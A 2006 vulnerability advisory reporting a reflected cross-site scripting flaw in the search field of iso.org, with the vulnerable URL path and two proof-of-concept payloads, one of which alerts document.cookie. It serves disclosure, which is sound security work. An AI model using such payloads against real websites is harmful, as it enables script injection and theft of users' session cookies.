ISO.org - XSS vulnerability ----------------------------------------------
Type: Cross site scripting Date: June, 13th 2006 ---------------------------------------------- Credits: ---------------------------------------------- Discovered by: David "Aesthetico" Vieira-Kurz http://www.majorsecurity.de ---------------------------------------------- Vulnerability: ---------------------------------------------- I found a bug in the searchField of the official site of the "International Organisation for Standardization("http://iso.org/";). It is vulnerable for cross site scripting. Sending a malicious code will result a code working on the page that pops up... /iso/en/CombinedQueryResult.CombinedQueryResult?queryString=[XSS CODE HERE] Examples: ---------------------------------------------- /iso/en/CombinedQueryResult.CombinedQueryResult?queryString=<script>alert("MajorSecurity")</script> /iso/en/CombinedQueryResult.CombinedQueryResult?queryString=3Cscript%3Ealert(document.cookie)%3C/script%3E
